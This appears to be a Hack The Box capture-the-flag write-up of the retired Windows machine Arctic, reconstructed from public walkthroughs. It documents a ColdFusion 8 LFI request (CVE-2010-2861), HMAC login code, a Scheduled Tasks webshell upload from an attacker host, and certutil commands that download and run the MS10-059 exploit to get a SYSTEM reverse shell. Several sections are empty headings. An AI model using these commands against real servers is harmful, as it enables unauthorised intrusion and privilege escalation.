~ / foobarto.me / htb-machines
--:--:-- UTC
~ / htb-machines / arctic.md

arctic

Windows · Easy · released 2017-03-22 · retired 2017-12-09

Summary

This writeup is reconstructed from public walkthroughs (see Source attribution below). I have not personally rooted this box.

Arctic runs Adobe ColdFusion 8.0.1 on JRun Web Server, and the foothold is CVE-2010-2861, a directory-traversal / locale-include flaw in the /CFIDE/administrator/enter.cfm page that lets an unauthenticated attacker read arbitrary files relative to the ColdFusion install root. The single high-value file to read is C:\ColdFusion8\lib\password.properties, which contains the admin console’s SHA-1 password hash (no salt). After offline cracking, the attacker logs into /CFIDE/administrator/, abuses the Scheduled Tasks feature to write a JSP webshell to a script-mapped path, and lands a shell as tolis. Privilege escalation is MS10-059 (“Chimichurri”) — a kernel-mode bug in the Windows tracing/serviceability code that lifts a normal user shell to SYSTEM via a public PoC binary.

The teaching beat is “every credentialed-admin web app has a write-a-file primitive somewhere”. ColdFusion’s Scheduled Tasks feature is meant for legitimate cron-like work, but it accepts an arbitrary URL to download from and an arbitrary on-disk path to write the response to — which is a write-a-file primitive that, on a script-mapped server, is also a write-a- shell primitive. Recognising that pattern (in WordPress’s plugin-edit, in Jenkins’s script console, in any “save this output to disk” feature) is more durable than memorising the specific ColdFusion exploit.

Source attribution

Reconstruction is grounded in:

Recon

Three ports — none of them HTTP on tcp/80:

135/tcp   open  msrpc
8500/tcp  open  fmtp     (ColdFusion / JRun)
49154/tcp open  unknown  (RPC ephemeral)

The interesting one is tcp/8500. ColdFusion’s default web port is 8500, and the banner is enough fingerprint to start there. Browsing http://<TARGET>:8500/ returns a default JRun directory listing with /CFIDE/ linked — /CFIDE/administrator/enter.cfm is the admin login.

The login page header reveals the version: ColdFusion 8. CF8 was EOL’d by Adobe in 2014 and ships with two major preauth issues (CVE-2010-2861 LFI and the FCKeditor file-upload bug ZeroDayInitiative ZDI-09-014). Either is a foothold.

The page is slow — JRun on Windows 2008 with ColdFusion’s expression evaluator is famously sluggish. Several public walkthroughs note that even the login page can take 10–20 seconds to render. Don’t conflate that with timeouts.

Foothold — two viable paths

Path A — CVE-2010-2861 LFI + hash crack + Scheduled Tasks

The enter.cfm page on /CFIDE/administrator/ accepts a locale= parameter that is concatenated into a server-side template include. The path is normalized by ColdFusion after the include resolves, so ..\..\..\..\ traversal with a trailing %00 to truncate the appended .cfm reaches arbitrary files relative to the CF install root.

GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../
ColdFusion8/lib/password.properties%00en HTTP/1.1

The response inlines the contents of password.properties into the rendered HTML. The interesting line:

password=<SHA1 of admin console password>

That’s an unsalted SHA-1 hash of the admin console password (plaintext is one of rockyou’s 10k most common — CrackStation returns it in milliseconds). ColdFusion 8 used SHA-1 for the admin password storage; later versions moved to a stronger KDF after this exact bug class kept biting them.

The CF8 login form uses a client-side HMAC-SHA1 wrapper to avoid sending the bare hash, so direct POSTing requires reproducing that step. The form pulls a fresh salt value on each render; the script then sends cfadminPassword = HMAC-SHA1(salt, SHA1(plaintext)).hex().upper():

salt = re.search(r'name="salt" type="hidden" value="(\d+)"', r.text).group(1)
mac  = hmac.new(salt.encode(), HASH.encode(), hashlib.sha1).hexdigest().upper()
data = {"cfadminUserId":"admin","cfadminPassword":mac,"salt":salt,
        "requestedURL":"/CFIDE/administrator/enter.cfm?","submit":"Login"}

The ColdFusion admin panel exposes a Scheduled Tasks feature (Server Settings → Scheduled Tasks) that takes a URL to download from and a local path to save the response to. Pointing the URL at an attacker-hosted JSP shell and the local path at C:\ColdFusion8\wwwroot\CFIDE\<name>.jsp writes a script-mapped JSP into the web root.

# attacker
cp /usr/share/webshells/jsp/cmdjsp.jsp ./shell.jsp
# Edit shell.jsp to inline a reverse shell, or rely on the cmd
# query parameter and chain it to a PowerShell IEX one-liner.
python3 -m http.server 80
nc -lvnp 4444

# in the ColdFusion admin panel:
URL:  http://<ATTACKER>:8080/cmd.jsp
File: C:\ColdFusion8\wwwroot\CFIDE\sh.jsp
Save Output: yes

The full param set used in the scripted POST to /CFIDE/administrator/scheduler/scheduleedit.cfm:

TaskName=shell
ScheduleType=Once
Start_Date=5 Μαϊ 2026         # form rendered in the box's locale (Greek)
Start_TimeSpecified=true
StartTimeOnce=12:00
Operation=HTTPRequest
ScheduledURL=http://<ATTACKER>:8080/cmd.jsp
Request_Time_out=60
publish=1                       # NOT publish=true — boolean is "1"/"0"
publish_file=C:\ColdFusion8\wwwroot\CFIDE\sh.jsp
adminsubmit=Submit

Field names diverge from older walkthroughs in two places worth flagging: the time field is StartTimeOnce (not Start_Time), and the “save output” checkbox is publish=1 (not publish=true). The form’s Start_Date field is also locale-formatted — on this rebuild the box is in el-GR (the rendered date is Μαϊ, Greek for “May”), so a parser needs to match that style or accept the server default.

Trigger via GET /CFIDE/administrator/scheduler/scheduletasks.cfm?runtask=shell&timeout=0, then hit http://<TARGET>:8500/CFIDE/sh.jsp?c=whoami — returns arctic\tolis.

Path B — FCKeditor file upload (CVE-2009-2265)

ColdFusion 8 ships FCKeditor at /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm. A POST with a JSP body, a fake application/x-java-archive MIME type, and a null-byte-truncated CurrentFolder=/df.jsp%00 parameter writes the JSP into /userfiles/file/df.jsp. No auth. Browse to that URL to trigger.

Path B is one round-trip; Path A is more involved but more instructive (LFI → hash crack → admin panel → file write). Both land the same context.

arctic\tolis

tolis is a regular domain-joined user; the JRun service runs under that account by deliberate hardening rather than as SYSTEM.

User flag

user.txt is at C:\Users\tolis\Desktop\user.txt. Directly readable from the JSP shell context.

Privilege escalation — MS10-059 (Chimichurri)

systeminfo shows Windows Server 2008 with a small but non-empty hotfix list. Watson / Windows Exploit Suggester narrows the applicable kernel-mode bugs; the reliability winner is MS10-059 (CVE-2010-2554), an arbitrary write in the Windows tracing/serviceability code path that lets a non-admin caller overwrite the per-process Token to grant SYSTEM privileges.

The public PoC is universally referred to as “Chimichurri”:

# attacker — serve the binary
python3 -m http.server 8080
nc -lvnp 4444

# stage on victim via the existing JSP webshell (PowerShell iwr
# stalls past CF's request timeout on this rebuild — certutil is
# faster and the box has no AV/AMSI on the path)
curl -G --data-urlencode 'c=certutil.exe -urlcache -split -f http://<ATTACKER>:8080/Chimichurri.exe C:\Users\tolis\AppData\Local\Temp\c.exe' http://<TARGET>:8500/CFIDE/sh.jsp

# fire as tolis with attacker LHOST/LPORT
curl -G --data-urlencode 'c=C:\Users\tolis\AppData\Local\Temp\c.exe <ATTACKER> 4444' http://<TARGET>:8500/CFIDE/sh.jsp

The exploit launches and the listener catches a SYSTEM cmd:

C:\Windows\system32> whoami
nt authority\system

root.txt lives at C:\Users\Administrator\Desktop\root.txt.

Why each step worked

Counterfactuals

Key Takeaways

References

← all htb machines hackthebox.com ↗